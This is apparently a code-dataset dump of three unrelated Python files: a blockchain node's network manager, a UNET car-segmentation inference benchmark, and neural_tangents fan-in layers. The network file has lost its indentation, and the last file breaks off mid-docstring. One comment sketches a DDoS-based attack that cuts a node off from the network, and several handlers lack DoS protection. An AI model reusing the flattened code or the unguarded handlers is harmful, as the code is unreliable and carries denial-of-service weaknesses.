self.reconnect_list[node_params] = {'static_key':node.advertised_static_key, 'last_try_time':time.time(), 'try':0}
else:
self.reconnect_list[node_params]['last_try_time']=time.time()
self.reconnect_list[node_params]['try']+=1
if node_params in self.nodes:
self.nodes.pop(node_params)
if _type == "init":
node.deserialize_params(message, remote=True)
self.nodes[(node.host, node.port)]=node
if (node.advertised_host, node.advertised_port) in self.reconnect_list:
self.reconnect_list.pop((node.advertised_host, node.advertised_port))
#XXX possible attack here: if an attacker wants to exclude a node (segment)
# from the network. (s)he can DDoS this node and then reconnect it to all other
# nodes. If (s)he will advertise the attacked
# node host and port as its own, disconnected nodes will not try to
# reconnect. At the same time. if the attacker simulates multiple connections
# to the attacked node from previously connected nodes (again, advertising fake
# host and port), attacked node will not try to reconnect to disconnected
# nodes either. It is a difficult attack which requires enormous DDoS
# abilities, knowing of network topology, and absence of fresh coming nodes.
# Nevertheless, this issue should be revisited
if _type == "give nodes":
node_list_to_send = []
for k,v in self.nodes.items():
if not v==node:
node_list_to_send.append(v.serialize_params())
message = b"\x00\04"+len(node_list_to_send).to_bytes(2, "big") #TODO move byte operation unde node interface
for node_to_send in node_list_to_send:
message += len(node_to_send).to_bytes(2, "big") + node_to_send
await node.send(message)
if _type == "take nodes":
try:
node_list_len, r = message[:2], message[2:]
node_list_len = int.from_bytes(node_list_len, "big")
nodes=[]
local_in_connection=[]
try:
# Node appears in known_nodes only after `init` message
# So if the information about the node will reach us multiple times before
# the first successfull connection, we will try to connect to it multiple times
# self.in_connection is used to prohibit such behavior
self.in_connection
except:
self.in_connection = []
for i in range(node_list_len):
_node_len, r = r[:2], r[2:]
_node_len = int.from_bytes(_node_len, "big")
_node, r = r[:_node_len], r[_node_len:]
new_node = Node(self.our_node, None, self.loop, self.handle_message, serialized_params=_node)
#nodes.append(new_node.connect())
if not (new_node.host, new_node.port) in self.get_known_nodes():
if not (new_node.host, new_node.port) in self.in_connection:
if not (new_node.host, new_node.port) == (self.our_node.host, self.our_node.port):
if not new_node.static_key.serialize() == self.our_node.static_key.serialize(): # mirror replay
#await new_node.connect()
task = new_node.connect()
nodes.append(task)
self.in_connection.append((new_node.host, new_node.port))
local_in_connection.append((new_node.host, new_node.port))
if len(nodes):
await asyncio.wait(nodes)
for _node in local_in_connection:
self.in_connection.remove(_node)
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give next headers":
try:
_ser_num, from_hash = message[:2], message[2:32+2]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': "give next headers",
'id':str(uuid4()), "num": num,
"from": bytes(from_hash), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the headers":
try:
_ser_num, headers = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'take the headers',
'id':str(uuid4()), "num": num,
"headers": bytes(headers), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give blocks":
try:
_ser_num, block_hashes = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'give blocks',
'id':str(uuid4()), "num": num,
"block_hashes": bytes(block_hashes), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the blocks":
try:
_ser_num, blocks = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'take the blocks',
'id':str(uuid4()), "num": num,
"blocks": bytes(blocks), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give the txos":
try:
_ser_num, txos_hashes = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'give txos',
'id':str(uuid4()), "num": num,
"txos_hashes": bytes(txos_hashes), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the txos":
try:
_ser_num, message = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
txos_hashes, txos_lengths, txos = message[:num*65], message[num*65:num*65+num*2], message[num*65+num*2:]
self.syncer.queues["Blockchain"].put({'action': 'take the txos',
'id':str(uuid4()), "num": num,
"txos_hashes": bytes(txos_hashes), "txos_lengths": bytes(txos_lengths),
"txos": bytes(txos), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take tip info":
try:
_ser_height, message = message[:4], message[4:]
tip, prev_hash, message = message[:32], message[32:64], message[64:]
_ser_td = message[:32]
height, total_difficulty = int.from_bytes(_ser_height, "big"), int.from_bytes(_ser_td, "big"),
self.syncer.queues["Blockchain"].put({'action': 'take tip info',
'id':str(uuid4()), "height": height, "prev_hash": bytes(prev_hash),
"tip":bytes(tip), "total_difficulty":total_difficulty, "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "find common root":
try:
self.syncer.queues["Blockchain"].put({'action': 'find common root',
'id':str(uuid4()), "serialized_header": bytes(message),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "find common root response":
try:
header_hash, serialized_len, message = message[:32], message[32:33], message[33:]
_len = int.from_bytes(serialized_len, "big") # SHouldn't we just use message[32] ?
known_headers = message[:_len]
self.syncer.queues["Blockchain"].put({'action': 'find common root response',
'id':str(uuid4()), "header_hash": bytes(header_hash),
'flags_num':_len, "known_headers": bytes(known_headers),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take TBM transaction":
try:
serialized_mode, serialized_skeleton = message[:2], message[2:]
self.syncer.queues["Blockchain"].put({'action': 'take TBM transaction',
'id':str(uuid4()), "tx_skel": bytes(serialized_skeleton),
"mode": int.from_bytes(serialized_mode, "big"),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give TBM transaction":
try:
self.syncer.queues["Blockchain"].put({'action': 'give TBM transaction',
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
def get_known_nodes(self):
nodes = [(node.advertised_host,node.advertised_port) for k,node in self.nodes.items()]
nodes = nodes+list(self.nodes)
return set(nodes)
def check_global_message_queue(self):
while not self.global_message_queue.empty():
message = self.global_message_queue.get()
action = message['action']
if action == "open connection":
host, port, static_key = message['host'], message['port'], PublicKey(message['static_key'], raw=True)
coro = self.connect_to( (host, port), static_key=static_key)
asyncio.ensure_future(coro, loop=self.loop)
if action == "get connections num":
_id = message['id']
request_source = message['sender']
self.syncer.queues[request_source].put({'id':_id, 'result':len(self.nodes)})
if action == "give intrinsic nodes list": #Not list anymore, considr renaming TODO
_id = message['id']
request_source = message['sender']
nodes_info = list(self.nodes.keys())
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "give nodes list": #Not list anymore, considr renaming TODO
_id = message['id']
request_source = message['sender']
nodes_info = {}
for node_params in self.nodes:
node = self.nodes[node_params]
nodes_info[(node.advertised_host, node.advertised_port)] = {'pubkey': node.static_key.serialize(),
'version': node.version}
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "give my node":
_id = message['id']
request_source = message['sender']
nodes_info = {(self.our_node.advertised_host, self.our_node.advertised_port): self.our_node.static_key.serialize()}
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "take the headers":
num, headers, node_params = message["num"], message["headers"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the headers"]
message_to_send += num.to_bytes(2,"big")
message_to_send += headers
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take the blocks":
num, blocks, node_params = message["num"], message["blocks"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the blocks"]
message_to_send += num.to_bytes(2,"big")
message_to_send += blocks
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take the txos":
num, txos, txos_hashes, txos_lengths, node_params = message["num"], message["txos"], message["txos_hashes"], message["txos_lengths"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the txos"]
message_to_send += num.to_bytes(2,"big")
message_to_send += txos_hashes
message_to_send += txos_lengths
message_to_send += txos
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give blocks":
num, blocks_hashes, node_params = message["num"], message["block_hashes"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give blocks"]
message_to_send += num.to_bytes(2,"big")
message_to_send += blocks_hashes
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give next headers":
num, from_hash, node_params = message["num"], message["from"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give next headers"]
message_to_send += num.to_bytes(2,"big")
message_to_send += from_hash
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give txos":
num, txos_hashes, node_params = message["num"], message["txos_hashes"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give the txos"]
message_to_send += num.to_bytes(2,"big")
message_to_send += txos_hashes
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take tip info":
logger.info("Take tip info")
height, tip, prev_hash, total_difficulty, node_params = message["height"], message["tip"], message["prev_hash"], message["total_difficulty"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take tip info"]
message_to_send += height.to_bytes(4,"big")
message_to_send += tip
message_to_send += prev_hash
message_to_send += total_difficulty.to_bytes(32,"big")
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "find common root":
serialized_header, node_params = message["serialized_header"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["find common root"]
message_to_send += serialized_header
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "find common root response":
header_hash, known_headers, _len, node_params = message["header_hash"], message["known_headers"], message['flags_num'], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["find common root response"]
message_to_send += header_hash
message_to_send += _len.to_bytes(1,"big")
message_to_send += known_headers
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take TBM transaction":
mode, serialized_tx_skel, node_params = message["mode"], message["tx_skel"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take TBM transaction"]
message_to_send += mode.to_bytes(2,"big")
message_to_send += serialized_tx_skel
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give TBM transaction":
node_params = message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give TBM transaction"]
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
'''if action == "send ping":
for node in self.nodes:
coro = node.send( "ping 0")
asyncio.ensure_future(coro, loop=self.loop)'''
if action == "stop":
logger.info("NetworkManager stops")
self.loop.stop()
return
if self.up:
self.loop.call_later(0.5, self.check_global_message_queue)
async def reconnect_loop(self):
def try_num_to_delay(try_num):
if try_num==0:
return 0
delay = 30*(2**try_num)
if delay > 1*3600:
delay = 1*3600
return delay
while self.up:
for node_params in self.reconnect_list:
ltt = self.reconnect_list[node_params]['last_try_time']
t = self.reconnect_list[node_params]['try']
if time.time()>ltt+try_num_to_delay(t):
asyncio.ensure_future(self.connect_to( node_params, static_key=self.reconnect_list[node_params]['static_key']))
await asyncio.sleep(5)
def NM_launcher(syncer, config):
  """Create a fresh event loop, attach a NetworkManager to it and run forever.

  Blocks the calling thread; intended as the entry point of a dedicated
  networking thread or process.
  """
  event_loop = asyncio.new_event_loop()
  asyncio.set_event_loop(event_loop)
  manager = NetworkManager(event_loop, syncer, config)  # keep a live reference
  event_loop.run_forever()
| WTRMQDev/leer | leer/transport/network_manager.py | network_manager.py | py | 24,028 | python | en | code | 5 | github-code | 90 |
22617743020 | import time
import torch
from model import UNET
from utils import save_prediction_as_imgs
from dataset import CarvanaDataset
from torch.utils.data import DataLoader
import albumentations as A
from albumentations.pytorch import ToTensorV2
from PIL import Image
import numpy as np
import torchvision
import cv2
# Inference resolution (height x width) the model expects.
IMAGE_HEIGHT = 480
IMAGE_WIDTH = 720
# NOTE(review): BATCH_SIZE / NUM_WORKERS / PIN_MEMORY are not used anywhere
# in this script -- presumably copied from the training config.
BATCH_SIZE = 4
NUM_WORKERS = 2
PIN_MEMORY = True
# Resize + scale pixels to [0, 1] (mean 0, std 1, max_pixel_value 255),
# then convert HWC numpy to CHW torch tensor.
test_transform = A.Compose(
    [
        A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),
        A.Normalize(
            mean = [0.0, 0.0, 0.0],
            std = [1.0, 1.0, 1.0],
            max_pixel_value = 255.0,
        ),
        ToTensorV2(),
    ]
)
# Load model weights from a checkpoint dict holding a 'state_dict' entry.
model = UNET(in_channels=3, out_channels=1)
model_path = 'model/model_2.pth.tar'
checkpoint = torch.load(model_path)
model.load_state_dict(checkpoint['state_dict'])
# Inference function
def inference_image(image_path, model, image_transform, device='cuda'):
    """Run one segmentation pass and write 'pred.png' and 'masked_car_w.jpg'.

    Args:
        image_path: path to an RGB input image.
        model: segmentation network producing one logit channel.
        image_transform: albumentations transform returning {'image': tensor}.
        device: torch device string ('cpu' or 'cuda').
    """
    print("Device: ", device)
    model = model.to(device)
    img = np.array(Image.open(image_path).convert("RGB"))
    img_normalized = image_transform(image=img)
    # Add the batch dimension and move to the target device.
    img_normalized = img_normalized['image'].unsqueeze(0).to(device)
    model.eval()
    with torch.no_grad():
        # Sigmoid logits, then binarize at 0.5 into a {0, 1} float mask.
        preds = torch.sigmoid(model(img_normalized))
        preds = (preds>0.5).float()
        torchvision.utils.save_image(
            preds, "pred.png"
        )
        # Scale back to [0, 255] (inputs were normalized by /255).
        img_tensor = img_normalized*255
        mask_tensor = preds*255
        # Convert Image to OpenCV
        # CHW tensor -> HWC float32 numpy arrays.
        cv_img = img_tensor[0].cpu().numpy().transpose(1, 2, 0)
        cv_mask = mask_tensor[0].cpu().numpy().transpose(1, 2, 0)
        # Masking
        # Paint predicted pixels (mask value 255) green, then blend 30/70
        # with the original; addWeighted writes in place into masked_car.
        masked_car = np.copy(cv_img)
        masked_car[(cv_mask>254).all(-1)] = [0,255,0]
        masked_car_w = cv2.addWeighted(masked_car, 0.3, cv_img, 0.7, 0, masked_car)
        # NOTE(review): masked_car_w is float32; cv2.imwrite truncates floats
        # when saving -- confirm this produces the intended image.
        cv2.imwrite('masked_car_w.jpg', masked_car_w)
# ---------------------------------------------------------------------------
# Benchmark: compare the eager model against its TorchScript version on CPU
# and (when available) GPU. The repeated time/print boilerplate is factored
# into a helper; printed labels are unchanged.
# ---------------------------------------------------------------------------
image_path = 'data/test/0ee135a3cccc_04.jpg'


def _benchmark(label, bench_model, device):
    """Run one timed inference pass and print the elapsed wall-clock time."""
    start_time = time.time()
    inference_image(image_path, bench_model, test_transform, device=device)
    print(label, time.time() - start_time)


# Eager PyTorch model.
_benchmark("Torch Model CPU time: ", model, 'cpu')
if torch.cuda.is_available():
    _benchmark("Torch Model GPU time: ", model, 'cuda')

# TorchScript model (scripting keeps Python control flow, unlike tracing).
scripted_model = torch.jit.script(model)
_benchmark("Scripted Model CPU time: ", scripted_model, 'cpu')
if torch.cuda.is_available():
    _benchmark("Scripted Model GPU time: ", scripted_model, 'cuda')
15984687296 | import functools
from typing import Callable, Iterable, Optional, Sequence
import warnings
from jax import numpy as jnp
import jax.example_libraries.stax as ostax
from .requirements import layer, supports_masking
from ..utils.kernel import Kernel
from ..utils.typing import InternalLayer, InternalLayerMasked, Kernels
@layer
def FanOut(num: int) -> InternalLayer:
  """Fan-out.

  Produces `num` identical copies of its input so that subsequent layers
  (for example residual branches) can process them independently.

  Args:
    num: The number of outgoing edges to fan out into.

  Returns:
    `(init_fn, apply_fn, kernel_fn)`.
  """
  init_fn, apply_fn = ostax.FanOut(num)

  def kernel_fn(k, **kwargs):
    # All branches see the same input, hence `num` copies of the kernel.
    return [k] * num

  return init_fn, apply_fn, kernel_fn
@layer
@supports_masking(remask_kernel=False)
def FanInSum() -> InternalLayerMasked:
  """Fan-in sum.

  This layer takes a number of inputs (e.g. produced by
  :obj:`~neural_tangents.stax.FanOut`) and sums the inputs to produce a single
  output. Based on :obj:`jax.example_libraries.stax.FanInSum`.

  Returns:
    `(init_fn, apply_fn, kernel_fn)`.
  """
  init_fn, apply_fn = ostax.FanInSum
  def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
    # Bring all input kernels to a common spatial-axis order first.
    ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
    if not all([k.shape1 == ks[0].shape1 and
                k.shape2 == ks[0].shape2 for k in ks[1:]]):
      raise ValueError('All shapes should be equal in `FanInSum/FanInProd`, '
                       f'got `x1.shape`s of {[k.shape1 for k in ks]}, '
                       f'`x2.shape`s of {[k.shape2 for k in ks]}.')
    is_gaussian = all(k.is_gaussian for k in ks)
    if not is_gaussian and len(ks) != 1:
      # TODO(xlc): FanInSum/FanInConcat could allow non-Gaussian inputs, but
      # we need to propagate the mean of the random variables as well.
      raise NotImplementedError('`FanInSum` is only implemented for the '
                                'case where all input layers guaranteed to be '
                                'mean-zero Gaussian, i.e. having all '
                                '`is_gaussian` set to `True`, got '
                                f'{[k.is_gaussian for k in ks]}.')
    # Covariances of independent mean-zero inputs add elementwise; a leading
    # `None` means the matrix is absent for all inputs and stays `None`.
    _mats_sum = lambda mats: None if mats[0] is None else sum(mats)
    cov1s = [k.cov1 for k in ks]
    cov2s = [k.cov2 for k in ks]
    nngps = [k.nngp for k in ks]
    ntks = [k.ntk for k in ks]
    cov1, cov2, nngp, ntk = map(_mats_sum, (cov1s, cov2s, nngps, ntks))
    # Remaining metadata (shapes, axes, flags) is shared; take it from ks[0].
    return Kernel(
        cov1=cov1,
        cov2=cov2,
        nngp=nngp,
        ntk=ntk,
        x1_is_x2=ks[0].x1_is_x2,
        is_gaussian=is_gaussian,
        is_reversed=is_reversed,
        is_input=ks[0].is_input,
        diagonal_batch=ks[0].diagonal_batch,
        diagonal_spatial=ks[0].diagonal_spatial,
        shape1=ks[0].shape1,
        shape2=ks[0].shape2,
        batch_axis=ks[0].batch_axis,
        channel_axis=ks[0].channel_axis,
        mask1=None,
        mask2=None,
    )  # pytype:disable=wrong-keyword-args
  def mask_fn(mask, input_shape):
    # The sum is masked only where every summand is masked.
    return _sum_masks(mask)
  return init_fn, apply_fn, kernel_fn, mask_fn
@layer
@supports_masking(remask_kernel=False)
def FanInProd() -> InternalLayerMasked:
  """Fan-in product.

  This layer takes a number of inputs (e.g. produced by
  :obj:`~neural_tangents.stax.FanOut`) and elementwise-multiplies the inputs to
  produce a single output.

  Returns:
    `(init_fn, apply_fn, kernel_fn)`.
  """
  # init_fn of FanInSum is shape-compatible; only apply_fn differs.
  init_fn, _ = ostax.FanInSum
  def apply_fn(params, inputs, **kwargs):
    return functools.reduce(jnp.multiply, inputs)
  def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
    ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
    if not all([k.shape1 == ks[0].shape1 and
                k.shape2 == ks[0].shape2 for k in ks[1:]]):
      raise ValueError('All shapes should be equal in `FanInProd`.')
    # A product of independent inputs is Gaussian only in the trivial
    # single-input case.
    is_gaussian = len(ks) == 1 and ks[0].is_gaussian
    def _mats_prod(nngps, ntks):
      # If any NTK is absent the product NTK cannot be formed either.
      if None in ntks:
        return functools.reduce(jnp.multiply, nngps), None
      nngp_prod, ntk_prod = 1., 0.
      for nngp, ntk in zip(nngps, ntks):
        # Product rule: each factor's NTK is weighted by the running NNGP
        # product of the other factors.
        ntk_prod = ntk_prod * nngp + nngp_prod * ntk
        nngp_prod *= nngp
      return nngp_prod, ntk_prod
    cov1s = [k.cov1 for k in ks]
    cov2s = [k.cov2 for k in ks]
    nngps = [k.nngp for k in ks]
    ntks = [k.ntk for k in ks]
    cov1 = functools.reduce(jnp.multiply, cov1s)
    cov2 = None if None in cov2s else functools.reduce(jnp.multiply, cov2s)
    nngp, ntk = _mats_prod(nngps, ntks)
    return Kernel(
        cov1=cov1,
        cov2=cov2,
        nngp=nngp,
        ntk=ntk,
        x1_is_x2=ks[0].x1_is_x2,
        is_gaussian=is_gaussian,
        is_reversed=is_reversed,
        is_input=ks[0].is_input,
        diagonal_batch=ks[0].diagonal_batch,
        diagonal_spatial=ks[0].diagonal_spatial,
        shape1=None,
        shape2=None,
        batch_axis=ks[0].batch_axis,
        channel_axis=ks[0].channel_axis,
        mask1=None,
        mask2=None,
    )  # pytype:disable=wrong-keyword-args
  def mask_fn(mask, input_shape):
    # A product is masked only where every factor is masked.
    return _sum_masks(mask)
  return init_fn, apply_fn, kernel_fn, mask_fn
@layer
@supports_masking(remask_kernel=False)
def FanInConcat(axis: int = -1) -> InternalLayerMasked:
  """Fan-in concatenation.

  This layer takes a number of inputs (e.g. produced by
  :obj:`~neural_tangents.stax.FanOut`) and concatenates the inputs to produce a
  single output. Based on :obj:`jax.example_libraries.stax.FanInConcat`.

  Args:
    axis: Specifies the axis along which input tensors should be concatenated.

  Returns:
    `(init_fn, apply_fn, kernel_fn)`.
  """
  init_fn, apply_fn = ostax.FanInConcat(axis)
  def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
    ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
    diagonal_batch = ks[0].diagonal_batch
    diagonal_spatial = ks[0].diagonal_spatial
    shape1, shape2 = ks[0].shape1, ks[0].shape2
    ndim = len(shape1)
    _axis = axis % ndim
    batch_axis = ks[0].batch_axis
    channel_axis = ks[0].channel_axis
    # All inputs must agree on every axis except the concatenation axis.
    new_shape1 = shape1[:_axis] + shape1[_axis + 1:]
    new_shape2 = shape2[:_axis] + shape2[_axis + 1:]
    for k in ks:
      k_shape1 = k.shape1[:_axis] + k.shape1[_axis + 1:]
      k_shape2 = k.shape2[:_axis] + k.shape2[_axis + 1:]
      if k_shape1 != new_shape1 or k_shape2 != new_shape2:
        raise ValueError('Non-`axis` shapes should be equal in `FanInConcat`.')
    # Check if inputs are independent Gaussians.
    if _axis != channel_axis:
      is_gaussian = all(k.is_gaussian for k in ks)
      if not is_gaussian:
        # TODO(xlc): FanInSum/FanInConcat could allow non-Gaussian inputs, but
        # we need to propagate the mean of the random variables as well.
        raise NotImplementedError(
            '`FanInConcat` layer along the non-channel axis is only implemented'
            'for the case if all input layers guaranteed to be mean-zero '
            'Gaussian, i.e. having all `is_gaussian` set to `True`.')
    else:
      # TODO(romann): allow nonlinearity after channelwise concatenation.
      # TODO(romann): support concatenating different channelwise masks.
      is_gaussian = False
    if _axis == batch_axis:
      warnings.warn(f'Concatenation along the batch axis ({_axis}) gives '
                    f'inconsistent covariances when batching - '
                    f'proceed with caution.')
    spatial_axes = tuple(i for i in range(ndim)
                         if i not in (channel_axis, batch_axis))
    # Change spatial axis according to the kernel `is_reversed`.
    if _axis in spatial_axes and is_reversed:
      _axis = spatial_axes[::-1][spatial_axes.index(_axis)]
    # Map activation tensor axis to the covariance tensor axis:
    # batch -> 0, channel -> -1 (averaging), i-th spatial axis -> i + 1.
    tensor_axis_to_kernel_axis = {
        **{
            batch_axis: 0,
            channel_axis: -1,
        },
        **{
            spatial_axis: idx + 1
            for idx, spatial_axis in enumerate(spatial_axes)
        }
    }
    _axis = tensor_axis_to_kernel_axis[_axis]
    # Channel widths weight the channelwise average inside _concat_kernels.
    widths = [k.shape1[channel_axis] for k in ks]
    cov1 = _concat_kernels([k.cov1 for k in ks], _axis,
                           diagonal_batch, diagonal_spatial, widths)
    cov2 = _concat_kernels([k.cov2 for k in ks], _axis,
                           diagonal_batch, diagonal_spatial, widths)
    # nngp/ntk always store the full batch-batch covariance, hence `False`.
    nngp = _concat_kernels([k.nngp for k in ks], _axis,
                           False, diagonal_spatial, widths)
    ntk = _concat_kernels([k.ntk for k in ks], _axis,
                          False, diagonal_spatial, widths)
    return Kernel(cov1=cov1,
                  cov2=cov2,
                  nngp=nngp,
                  ntk=ntk,
                  x1_is_x2=ks[0].x1_is_x2,
                  is_gaussian=is_gaussian,
                  is_reversed=is_reversed,
                  is_input=ks[0].is_input,
                  diagonal_batch=diagonal_batch,
                  diagonal_spatial=diagonal_spatial,
                  shape1=None,
                  shape2=None,
                  batch_axis=batch_axis,
                  channel_axis=channel_axis,
                  mask1=None,
                  mask2=None)  # pytype:disable=wrong-keyword-args
  def mask_fn(mask, input_shape):
    return _concat_masks(mask, input_shape, axis)
  return init_fn, apply_fn, kernel_fn, mask_fn
# INTERNAL UTILITIES
def _map_tuples(fn: Callable, tuples: Iterable[tuple]) -> tuple:
return tuple(map(fn, zip(*(t for t in tuples))))
def _sum_masks(masks: list[Optional[jnp.ndarray]]) -> Optional[jnp.ndarray]:
def add_two_masks(mask1, mask2):
if mask1 is None:
return mask2
if mask2 is None:
return mask1
return mask1 & mask2
mask = functools.reduce(add_two_masks, masks, None)
return mask
def _concat_masks(
masks: list[Optional[jnp.ndarray]],
input_shapes: Sequence[Sequence[int]],
axis: int
) -> Optional[jnp.ndarray]:
"""Returns a mask which is a concatenation of `masks`.
Since elements of `masks` can have any shapes broadcastable to respective
elements of `input_shapes`, their concatenation may require broadcasting and
cannot be done with a single `jnp.concatenate` call.
Args:
masks: list of masks to concatenate.
input_shapes: list of input shapes to which the masks are applied.
axis: concatenation axis.
Returns:
A single `jnp.ndarray` mask applicable to the concatenated inputs.
"""
if len(masks) != len(input_shapes):
raise ValueError(f'Number of masks ({len(masks)}) and inputs '
f'({len(input_shapes)}) don\'t match, please file a bug at'
f' https://github.com/google/neural-tangents/issues/new.')
if all(m is None for m in masks):
return None
axis %= len(input_shapes[0])
# Expand the concatenation dimension of each mask.
masks = [m if m is None else jnp.broadcast_to(
m,
(m.shape[:axis] +
tuple(input_shapes[i][axis: axis + 1]) +
m.shape[axis + 1:]))
for i, m in enumerate(masks)]
# Max shape to broadcast all masks to along non-concat dimension.
max_shape = _map_tuples(max, (m.shape for m in masks if m is not None))
# Shape of the mask to replace `None` masks with.
max_shapes = [tuple(map(min, max_shape, i)) for i in input_shapes]
masks = [
(jnp.broadcast_to(
m,
max_shape[:axis] + m.shape[axis: axis + 1] + max_shape[axis + 1:])
if m is not None
else jnp.zeros_like(max_shapes[i], dtype=jnp.bool_)) # pytype: disable=wrong-arg-types # jnp-type
for i, m in enumerate(masks)
]
return jnp.concatenate(masks, axis)
def _preprocess_kernels_for_fan_in(ks: Kernels) -> tuple[list[Kernel], bool]:
  """Validate layouts and bring all kernels to one spatial-axis order.

  Raises `NotImplementedError` if the kernels disagree on their covariance
  layout, flips the minority of kernels whose `is_reversed` flag differs
  from the majority, and warns about the independence assumption.
  """
  first = ks[0]
  same_layout = all(
      k.diagonal_batch == first.diagonal_batch and
      k.diagonal_spatial == first.diagonal_spatial and
      k.batch_axis == first.batch_axis and
      k.channel_axis == first.channel_axis
      for k in ks[1:])
  if not same_layout:
    raise NotImplementedError('`FanIn` layers are only implemented for the '
                              'case if all input layers output the same layout '
                              'of covariance matrices, i.e. having all '
                              'matching `diagonal_batch` and '
                              '`diagonal_spatial` and other attributes.')
  # Majority vote on the spatial-axis order; flip the minority to match.
  ks = list(ks)
  is_reversed = sum(k.is_reversed for k in ks) > len(ks) / 2
  ks = [k.reverse() if k.is_reversed != is_reversed else k for k in ks]
  warnings.warn('`FanIn` layers assume independent inputs which is not verified'
                ' in the code. Please make sure to have at least one `Dense` / '
                '`Conv` / `GlobalSelfAttention` etc. layer in each branch.')
  return ks, is_reversed
def _concat_kernels(
    mats: Sequence[Optional[jnp.ndarray]],
    axis: int,
    diagonal_batch: bool,
    diagonal_spatial: bool,
    widths: Sequence[int]
) -> Optional[jnp.ndarray]:
  """Compute the covariance of concatenated activations with given covariances.

  Args:
    mats: Covariance tensors of the same shape.
    axis: Specifies the axis along which the covariances (not activations) are
      concatenated. `-1` corresponds to averaging.
    diagonal_batch: Specifies whether `cov1` and `cov2` store only
      the diagonal of the sample-sample covariance
      (`diagonal_batch == True`,
      `cov1.shape == (batch_size_1, ...)`),
      or the full covariance
      (`diagonal_batch == False`,
      `cov1.shape == (batch_size_1, batch_size_1, ...)`).
    diagonal_spatial: Specifies whether only the diagonals of the
      location-location covariances will be computed,
      (`diagonal_spatial == True`,
      `nngp.shape == (batch_size_1, batch_size_2, height, width, depth, ...)`),
      or the full covariance
      (`diagonal_spatial == False`,
